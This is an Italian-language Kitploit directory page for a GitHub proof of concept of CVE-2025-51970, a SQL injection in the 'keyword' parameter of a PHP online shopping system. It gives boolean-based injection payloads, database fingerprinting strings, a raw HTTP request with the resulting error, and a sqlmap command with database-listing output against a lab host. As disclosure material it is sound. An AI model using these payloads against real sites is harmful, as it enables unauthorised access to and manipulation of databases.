Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-51970 — Iniezione SQL in Online Shopping System Advanced (CVE-2025-51970) | Kitploit
Strumenti/GitHubGitHub/m4xiq/cve-2025-51970
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubm4xiq/cve-2025-51970

CVE-2025-51970

Iniezione SQL in Online Shopping System Advanced (CVE-2025-51970)

Vedi Repository
131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-51970

CVE-2025-51970 - SQL Injection in Online Shopping System Advanced

Riepilogo

È stata scoperta una vulnerabilità critica di SQL Injection nel progetto Online Shopping System Advanced di PuneethReddyHC. Il difetto risiede in action.php, che non riesce a sanitizzare adeguatamente l'input utente proveniente dal parametro POST keyword. Un attaccante può iniettare SQL dannoso per estrarre dati o alterare il database.


Dettagli Tecnici

  • Tipo di vulnerabilità: SQL Injection
  • File interessato: action.php
  • Parametro: keyword (via POST)
  • Versione interessata: 1.0
  • Tipo di attacco: Remoto
  • Impatto: Accesso non autorizzato ai dati, manipolazione del database

Prova di Concetto (PoC)

e%' AND ((42)=(43-1)) AND '0004XX7'!='0004XX7% e%' AND ((42)=(43)) AND '0004XX7'!='0004XX7% SELECT database(); -- Returns `onlineshop`

Payload Vera (Bypassa la Logica)

Payload Falsa (Non Supera la Logica)


Richiesta HTTP

root@kitploit:~
<Highlight language="http">
POST /online-shopping-system-advanced-master/action.php HTTP/1.1
Host: 192.168.1.109
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: */*
Referer: http://192.168.1.109/online-shopping-system-advanced-master/
Content-Length: 75
Connection: close
keyword=test'&search=1
</Highlight>

Risposta HTTP

root@kitploit:~
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2025 10:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12

Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near ''' at line 1 in 
C:\xampp\htdocs\online-shopping-system-advanced-master\action.php:193

Esempio di Fingerprint del Database


root@kitploit:~
e%' AND 2*3*8=6*8 AND '0004XX7'!='0004XX7%
e%' AND 3*2>5 AND '0004XX7'!='0004XX7%
e%' AND 3*2*0>=0 AND '0004XX7'!='0004XX7%

Sfruttamento Automatico con sqlmap

La vulnerabilità può essere confermata e sfruttata automaticamente utilizzando sqlmap.

Comando Utilizzato

root@kitploit:~
sqlmap -u "http://192.168.1.109/action.php" --data="keyword=test&search=1" --dbs

Output

root@kitploit:~
[13:07:39] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] onlineshop
[*] performance_schema
[*] phpmyadmin
[*] test
immagine
Scarica lo strumento